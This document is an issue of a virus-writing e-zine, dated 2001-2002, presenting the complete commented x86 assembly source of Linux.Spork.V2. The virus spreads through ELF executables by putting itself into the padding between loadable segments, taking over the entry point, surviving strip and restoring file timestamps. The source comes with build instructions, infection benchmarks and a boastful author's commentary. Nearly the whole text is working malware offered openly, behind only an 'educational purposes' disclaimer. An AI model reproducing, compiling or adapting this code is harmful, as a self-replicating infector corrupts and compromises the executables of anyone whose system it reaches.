/* ----------------------------------------------------------------------- )=- -=( Natural Selection Issue #1 ---------------------------- Linux.Spork.V2 )=- -=( ---------------------------------------------------------------------- )=- -=( 0 : Linux.Spork.V2 Features ------------------------------------------ )=- Imports: Nothing Infects: ELF executables with accessible permissions in current directory (ie: r/w group or other, or file ownership), strip safe Locates: Recursively fills a static buffer with directory information Compatability: Linux 2.2 - 2.4+ Kernels [Possibly 2.0 also] Saves Stamps: Of course MultiThreaded: Yes, forks host into a child process and after doing a infection round, sleeps until the host terminates, and catches it, to return to Linux gracefully Polymorphism: No AntiAV / EPO: Under Linux? Haw haw :) SEH Abilities: No (Linux doesn't crash) Payload: None -=( 1 : Linux.Spork.V2 Design Goals -------------------------------------- )=- : Create a simple virus to learn Linux assembly language programming : Plan a simple but effective ELF infection method covering majority of ELF ELF types and is strip safe : Mark ELFs that have been processed but are unable to be infected, so that they can be skipped in further generations : To implement a simple fork() so that the virus runs in a process, while the host does its own thing It took one week from beginning using Linux assembly language to making a working virus from it. That was Linux.Spork, which was insanely lost only a few hours after it was finished, to a lightning strike, with no backups. There is nothing sadder than outliving your virus, a perfect child that never had a chance to propogate anywhere before it was obliterated. However, after 2 days of wild coding later, reconstructing it just from memory, Linux.Spork V2 rises from the grave to take its place. FS can rebuild you. Make you better. Stronger. Faster. -=( 2 : Linux.Spork.V2 Design Faults ------------------------------------- )=- Most of the infection time is probably spent on expanding / truncating a lot of files, even if they're already infected, this could be sped up by a multiple open / close redesign. Fork process is not perfect. If the virus is the 'child' process, then when the host exit()'s the virus could be caught mid-infection and end up corrupting a file. So Linux.Spork V2 spawns the host as the child process, which means that its Process ID's show up in the listings as seperate threads. Also, if the host finishes before Linux.Spork V2 is finished with the directory, the user is left waiting until it's finished. This needs a redesign in the directory handling code. -=( 3 : Linux.Spork.V2 Benchmarking -------------------------------------- )=- A test was run to see what kind of speed the virus had in infecting large directories, to be improved on in later families. A mix of ELf / non-ELF files were copied, and mixed with an infected copy of 'ls'. Files : /usr/bin/[abcde]* 215 Files @ 18.064M Uninfected LS : real 0m0.037s user 0m0.030s sys 0m0.000s Infected LS 1 : real 0m0.171s user 0m0.110s sys 0m0.020s Infected LS 2 : real 0m0.059s user 0m0.010s sys 0m0.030s Result : 149 / 215 Files Infected @ 18.660M -=( 4 : Linux.Spork.V2 Disclaimer ---------------------------------------- )=- THE CONTENTS OF THIS ELECTRONIC MAGAZINE AND ITS ASSOCIATED SOURCE CODE ARE COVERED UNDER THE BELOW TERMS AND CONDITIONS. IF YOU DO NOT AGREE TO BE BOUND BY THESE TERMS AND CONDITIONS, OR ARE NOT LEGALLY ENTITLED TO AGREE TO THEM, YOU MUST DISCONTINUE USE OF THIS MAGAZINE IMMEDIATELY. COPYRIGHT Copyright on materials in this magazine and the information therein and their arrangement is owned by FEATHERED SERPENTS unless otherwise indicated. RIGHTS AND LIMITATIONS You have the right to use, copy and distribute the material in this magazine free of charge, for all purposes allowed by your governing laws. You are expressly PROHIBITED from using the material contained herein for any purposes that would cause or would help promote the illegal use of the material. NO WARRANTY The information contained within this magazine are provided "as is". FEATHERED SERPENTS do not warranty the accuracy, adequacy, or completeness of given information, and expressly disclaims liability for errors or omissions contained therein. No implied, express, or statutory warranty, is given in conjunction with this magazine. LIMITATION OF LIABILITY In *NO* event will FEATHERED SERPENTS or any of its MEMBERS be liable for any damages including and without limitation, direct or indirect, special, incidental, or consequential damages, losses, or expenses arising in connection with this magazine, or the use thereof. ADDITIONAL DISCLAIMER Computer viruses will spread of their own accord between computer systems, and across international boundaries. They are raw animals with no concern for the law, and for that reason your possession of them makes YOU responsible for the actions they carry out. The viruses provided in this magazine are for educational purposes ONLY. They are NOT intended for use in ANY WAY outside of strict, controlled laboratory conditions. If compiled and executed these viruses WILL land you in court(s). You will be held responsible for your actions. As source code these viruses are inert and covered by implied freedom of speech laws in some countries. In binary form these viruses are malicious weapons. FEATHERED SERPENTS do not condone the application of these viruses and will NOT be held LIABLE for any MISUSE. -=( 4 : Win32.Imports Compile Instructions ------------------------------- )=- as and ld as [--gstabs] -o spork.o linux.s spork.s ld -o spork spork.o -=( 5 : Linux.Spork.V2 --------------------------------------------------- )*/ .global _start .text # All hail gas style directives :) _start: # Put a $0 on the stack for us to overwrite later with the entrypoint of # the host. Lots of hosts will rely on the entry registers and flags to # determine which Linux kernel they are running under, so we save those. # pushl $0 pushal pushfl call _delta _delta: # Calculate our delta offset, then subtract where we are in memory from # where we expected to be in memory, to get a relocation value, then we # add it to the host entrypoint and overwrite the $0 on the stack so we # can return to it later. # popl %ebp subl $(_delta - _start), %ebp movl %ebp, %ebx movl %ebp, %esi subl $(_start), %ebp subl file_virus_entrypoint(%ebp),%esi addl file_hosts_entrypoint(%ebp),%esi movl %esi, (9*4)(%esp) # Fork the host out to a copy of this process. I'm not sure how much of # the memory space is 'copied' compared to 'shared', but that should be # looked into later. See the comments for why we fork the host and not # the virus. # # pid_t fork(void); # movl $__NR_fork, %eax int $0x80 testl %eax, %eax jz return pushl %eax # As we don't set any section flags [in order to stay anonymous], we'll # manually tweak our memory settings so that they're writeable. Note, # that we rarely start on a page boundary, and so we need to change two # pages, which we overlap. # # int mprotect(const void *addr, size_t len, int prot); # movl $__NR_mprotect, %eax andl $0xfffff000, %ebx movl $(PAGE_SIZE*2), %ecx movl $(PROT_READ|PROT_WRITE|PROT_EXEC), %edx int $0x80 # Open the current directory like a file, so we can use another call to # read in file/directory entries stored inside. # # int open(const char *pathname, int flags); # movl $__NR_open, %eax leal dir_infect(%ebp), %ebx movl $(O_RDONLY), %ecx int $0x80 movl %eax, dir_handle(%ebp) directory_fill: # Start / continue filling in our buffer with entries from this directory # handle. We can repeat this call over and over until it returns 0 for a # end of directory. # # int getdents(unsigned int fd, struct dirent *dirp, unsigned int count); # movl $__NR_getdents, %eax movl dir_handle(%ebp), %ebx leal dir_buffer(%ebp), %ecx movl $DBUF_SIZE, %edx int $0x80 testl %eax, %eax js waiter jz waiter movl %eax, dir_length(%ebp) leal dir_buffer(%ebp), %ebx directory_loop: # Using the name of this entry in the directory, grab a bunch of status # information, then make sure it's a file and not a device or socket or # other strange object, before we continue. # # int stat(const char *file_name, struct stat *buf); # pushl %ebx movl $__NR_stat, %eax leal dirent.d_name(%ebx),%ebx leal file_status(%ebp), %ecx int $0x80 testl %eax, %eax js directory_next testl $(S_IFREG), (file_status+stat.st_mode)(%ebp) jz directory_next # Here we'll change the status information file mode to give us just the # normal flags [which will be used later to restore them with the chmod # interrupt], and try to chmod them to o+rw. If you were anal, we could # check to see if we owned the file before we did this, but it will fail # harmlessly anyway. # # int chmod(const char *path, mode_t mode); # movl $__NR_chmod, %eax andl $(S_ISUID|S_ISGID|S_ISVTX|S_IRWXU|S_IRWXG|S_IRWXO), (file_status+stat.st_mode)(%ebp) movl (file_status+stat.st_mode)(%ebp), %ecx orl $(S_IRUSR|S_IWUSR), %ecx int $0x80 # Open the file for reading and writing. Restore attributes if it fails. # # int open(const char *pathname, int flags); # pushl %ebx movl $__NR_open, %eax movl $(O_RDWR), %ecx int $0x80 testl %eax, %eax js file_restcmo movl %eax, %ebx # Seek to the end of the file. # # off_t lseek(int fildes, off_t offset, int whence); # movl $__NR_lseek, %eax xorl %ecx, %ecx movl $SEEK_END, %edx int $0x80 # Append bytes to the file that our virus will fit into if necessary. We # need to do this here, because the mmap call won't expand files for us. # # ssize_t write(int fd, const void *buf, size_t count); # movl $__NR_write, %eax leal _start(%ebp), %ecx movl $PAGE_SIZE, %edx int $0x80 cmpl $PAGE_SIZE, %eax jne file_restore # The mmap call takes 6 parameters, so instead of passing with registers # we create a structure and fill it in, and pass that instead. This is # changing in the Linux 2.4 kernels I think, but this way will still be # supported for a long while yet [I hope]. # # void * mmap(void *start, size_t length, int prot, int flags, int fd, # off_t offset); # pushl %ebx movl (file_status+stat.st_size)(%ebp), %eax addl $PAGE_SIZE, %eax movl %eax, (file_memmap+mmap.length)(%ebp) movl %ebx, (file_memmap+mmap.fd)(%ebp) movl $__NR_mmap, %eax leal file_memmap(%ebp), %ebx int $0x80 testl %eax, %eax js file_truncer # Sanity Check #1: Is it an Executable ELF Version 1? # # cmpl $ELFMAG, (EI_MAG0)(%eax) jne file_mmunmap cmpb $EV_CURRENT, (EI_VERSION)(%eax) jne file_mmunmap cmpl $EV_CURRENT, (Elf32_Ehdr.e_version)(%eax) jne file_mmunmap cmpw $ET_EXEC, (Elf32_Ehdr.e_type)(%eax) jne file_mmunmap # Sanity Check #2: Is it in Intel 32 bit i386 format? # cmpb $ELFCLASS32, (EI_CLASS)(%eax) jne file_mmunmap cmpb $ELFDATA2LSB, (EI_DATA)(%eax) jne file_mmunmap cmpw $EM_386, Elf32_Ehdr.e_machine(%eax) jne file_mmunmap # Sanity Check #3: Has it been processed or infected? # If not mark it as being processed. # # ".NO." = 0x 2E 4E 4F 2E # cmpl $0, (EI_PAD)(%eax) jne file_mmunmap movl $0x2e4f4e2e, (EI_PAD)(%eax) # Grab information from the Program Header, and prepare for a loop through # each PT_LOAD. # movl Elf32_Ehdr.e_phoff(%eax), %ebx movzwl Elf32_Ehdr.e_phnum(%eax), %ecx file_outerph: # We only touch PT_LOAD sections as they are the only ones that end up in # accessible memory, as far as I'm aware. We make sure memory and file # size are the same so that we aren't overwritten by .bss information but # maybe in the future something can be done about that... # cmpl $PT_LOAD, Elf32_Phdr.p_type(%eax,%ebx) jne file_nextoph movl Elf32_Phdr.p_memsz(%eax,%ebx), %edx cmpl Elf32_Phdr.p_filesz(%eax,%ebx), %edx jne file_nextoph addl Elf32_Phdr.p_vaddr(%eax,%ebx), %edx # Now we have our suggested virtual address in memory, prepare for the # second loop through the Program Header. # pushl %ebx pushl %ecx movl Elf32_Ehdr.e_phoff(%eax), %ebx movzwl Elf32_Ehdr.e_phnum(%eax), %ecx xorl %edi, %edi file_innerph: # Loop through, sorting the PT_LOAD sections and looking for the one # that follows on closest from the one selected in the outer loop. # cmpl $PT_LOAD, Elf32_Phdr.p_type(%eax,%ebx) jne file_nextiph cmpl Elf32_Phdr.p_vaddr(%eax,%ebx), %edx ja file_nextiph cmpl Elf32_Phdr.p_vaddr(%eax,%ebx), %edi ja file_nextiph movl %ebx, %esi movl Elf32_Phdr.p_vaddr(%eax,%ebx), %edi file_nextiph: pushl %eax movzwl Elf32_Ehdr.e_phentsize(%eax), %eax addl %eax, %ebx popl %eax loop file_innerph # Make sure we found a following section, although this could also be # slightly tweaked to infect 'last' sections, they'd be rare. # popl %ecx popl %ebx testl %edi, %edi jz file_nextoph # If the sections have PAGE_SIZE or more between the end of one and the # start of the other, we have space to insert. # pushl %edi subl $PAGE_SIZE, %edi cmpl %edx, %edi popl %edi jae file_matchph # Alternatively, if there is less than PAGE_SIZE between the sections, # but a load-time PAGE_SIZE alignment between the two, we also have a # space to insert to. # pushl %edx andl $0xfffff000, %edi andl $0xfffff000, %edx cmpl %edx, %edi popl %edx jb file_nextoph cmpl $PAGE_SIZE, Elf32_Phdr.p_align(%eax,%esi) je file_matchph file_nextoph: # Continue looping through the Program Header looking for sections to # insert after. If we don't find any, we'll leave the file and it is # truncated at the exit. Also, we left our ".NO." tag so that it is # not attempted for infection again, hopefully saving some time. # pushl %eax movzwl Elf32_Ehdr.e_phentsize(%eax), %eax addl %eax, %ebx popl %eax loop file_outerph jmp file_mmunmap file_matchph: # Change the file mark to be 'infected'. Although we could keep it as a # 'already processed' mark, this lets me keep track of infected files on # my own system. # # Save the original entrypoint and replace it with ours, then discover # the end of this section in the file, and update our section with the # new memory and file sizes. # # ".FS." = 0x 2E 46 53 2E # movl $0x2e53462e, EI_PAD(%eax) pushl Elf32_Ehdr.e_entry(%eax) popl file_hosts_entrypoint(%ebp) movl %edx, Elf32_Ehdr.e_entry(%eax) movl %edx, file_virus_entrypoint(%ebp) movl Elf32_Phdr.p_offset(%eax,%ebx), %edx addl Elf32_Phdr.p_filesz(%eax,%ebx), %edx addl $PAGE_SIZE, Elf32_Phdr.p_filesz(%eax,%ebx) addl $PAGE_SIZE, Elf32_Phdr.p_memsz(%eax,%ebx) file_updatep: # Loop through the Program Header and update any file offsets that are # equal to or after our insertion point. Once we are finished, then I # do a check to make sure the Program Header itself isn't past us too, # in which case we update it also. # # Updating is just moving things to point 'forward' $PAGE_SIZE bytes. # movl Elf32_Ehdr.e_phoff(%eax), %ebx movzwl Elf32_Ehdr.e_phnum(%eax), %ecx 0: cmpl Elf32_Phdr.p_offset(%eax,%ebx), %edx ja 1f addl $PAGE_SIZE, Elf32_Phdr.p_offset(%eax,%ebx) 1: movzwl Elf32_Ehdr.e_phentsize(%eax), %esi addl %esi, %ebx loop 0b cmpl Elf32_Ehdr.e_phoff(%eax), %edx ja file_updates addl $PAGE_SIZE, Elf32_Ehdr.e_phoff(%eax) file_updates: # Do the same thing with the Section Header, updating file offsets of # sections as well as the Section Header itself if necessary [and it # is almost always necessary]. # movl Elf32_Ehdr.e_shoff(%eax), %ebx movzwl Elf32_Ehdr.e_shnum(%eax), %ecx xorl %edi, %edi 0: # While we are parsing, sort out the section with the highest address # in file, before reaching ours [ignore SHT_NOBITS ones, they don't # actually count for any file space]. # cmpl $SHT_NOBITS, Elf32_Shdr.sh_type(%eax,%ebx) je 1f cmpl $0, Elf32_Shdr.sh_size(%eax,%ebx) je 1f cmpl Elf32_Shdr.sh_offset(%eax,%ebx),%edx jbe 1f cmpl Elf32_Shdr.sh_offset(%eax,%ebx),%edi ja 1f movl %ebx, %esi movl Elf32_Shdr.sh_offset(%eax,%ebx),%edi 1: cmpl Elf32_Shdr.sh_offset(%eax,%ebx),%edx ja 2f addl $PAGE_SIZE, Elf32_Shdr.sh_offset(%eax,%ebx) 2: pushl %eax movzwl Elf32_Ehdr.e_shentsize(%eax), %eax addl %eax, %ebx popl %eax loop 0b # If we found a section before ours which can account for spaces in # the file space, then we increase it to include us, which makes us # strip safe. # testl %edi, %edi jz 3f addl $PAGE_SIZE, Elf32_Shdr.sh_size(%eax,%esi) 3: cmpl Elf32_Ehdr.e_shoff(%eax), %edx ja file_arrange addl $PAGE_SIZE, Elf32_Ehdr.e_shoff(%eax) file_arrange: # Move to the end of the original file, and copy every byte that is # after our insertion point, to the end of the new file, going all # the way backwards to where we will insert. We have to do it like # this so parts of the file don't overwrite itself. # movl (file_status+stat.st_size)(%ebp), %ecx leal (PAGE_SIZE-1)(%eax,%ecx), %edi leal -1(%eax,%ecx), %esi subl %edx, %ecx std rep movsb # Now insert the virus. We could save a few bytes in both of these rep # movsb calls, but we kept it like this for clarity to see what's going # on. # movl $PAGE_SIZE, %ecx leal _start(%ebp), %esi leal (%eax,%edx), %edi cld rep movsb # Add the size of the virus to the size used to truncate the file in a # moment. This way, we aren't cut out. # addl $PAGE_SIZE, (file_status+stat.st_size)(%ebp) file_mmunmap: # Commit the whole memory map to file. Note that if we didn't write the # $PAGE_SIZE bytes to the end before we mapped, these bytes be lost with # no warning. I learned that the hard way. Damn you POSIX. # # int munmap(void *start, size_t length); # movl $__NR_munmap, %ebx xchg %ebx, %eax movl (file_memmap+mmap.length)(%ebp), %ecx int $0x80 file_truncer: # Truncate file to appropriate size. That is, either the original size, # or the modified new size if we infected the file. # # int ftruncate(int fd, off_t length); # popl %ebx movl $__NR_ftruncate, %eax movl (file_status+stat.st_size)(%ebp), %ecx int $0x80 file_restore: # Close the file handle. # # int close(int fd); # movl $__NR_close, %eax int $0x80 file_restcmo: # Restore the time and date stamps. There is one more stamp, the ctime # or changetime stamp, which can't be changed from user mode as far as # I know. # # int utime(const char *filename, struct utimbuf *buf); # popl %ebx movl $__NR_utime, %eax pushl (file_status+stat.st_atime)(%ebp) pushl (file_status+stat.st_mtime)(%ebp) popl (file_stamps+utimbuf.modtime)(%ebp) popl (file_stamps+utimbuf.actime)(%ebp) leal file_stamps(%ebp), %ecx int $0x80 # Reset the file attributes to their original values. Note that we've # already AND'd out evil bits from the file_status structure. # # int chmod(const char *path, mode_t mode); # movl $__NR_chmod, %eax movl (file_status+stat.st_mode)(%ebp), %ecx int $0x80 directory_next: # Point us to the next entry in our directory buffer. We keep a track # of how many bytes we've processed to how many bytes were originally # filled in. If we run out of data, we return to the getdents routine # to refill the buffer. # popl %ebx movzwl dirent.d_reclen(%ebx), %eax addl %eax, %ebx subl %eax, dir_length(%ebp) jnz directory_loop jmp directory_fill waiter: # Wait until the host finishes executing. We saved the PID from the # wait call, otherwise we might find ourselves exiting when any other # child processes of the host finish. # # pid_t waitpid(pid_t pid, int *status, int options); # movl $__NR_waitpid, %eax popl %ebx xorl %ecx, %ecx xorl %edx, %edx int $0x80 _hosts: # Exit manually with the error/success code returned from the host. # See, viruses aren't destructive ;) This also doubles as our first # generation host, ie: just an exit call. # # void _exit(int status); # movl $__NR_exit, %ebx xchgl %ebx, %eax int $0x80 return: # This is never reached by the above code, only the fork() will get # here, popping the flags and registers off the stack and then it # will ret to the host address on the stack. # popfl popal ret .set DBUF_SIZE, 0x500 dir_infect: .asciz "." dir_buffer: .fill DBUF_SIZE dir_length: .long 0 dir_handle: .long 0 file_status: .fill stat_size file_memmap: .long 0,0, (PROT_READ|PROT_WRITE), (MAP_SHARED), 0,0 file_stamps: .fill utimbuf_size file_virus_entrypoint: .long _start file_hosts_entrypoint: .long _hosts .asciz "[Linux.Spork.V2] Still not a perfect fork, yet :)" .asciz "(c) 2001 of Feathered Serpents. Replicate freely." .fill 0x1000 # Extra space to make sure the virus is at # least PAGE_SIZE /*( ---------------------------------------------------------------------- )=- -=( Natural Selection Issue #1 --------------- (c) 2002 Feathered Serpents )=- -=( ---------------------------------------------------------------------- )*/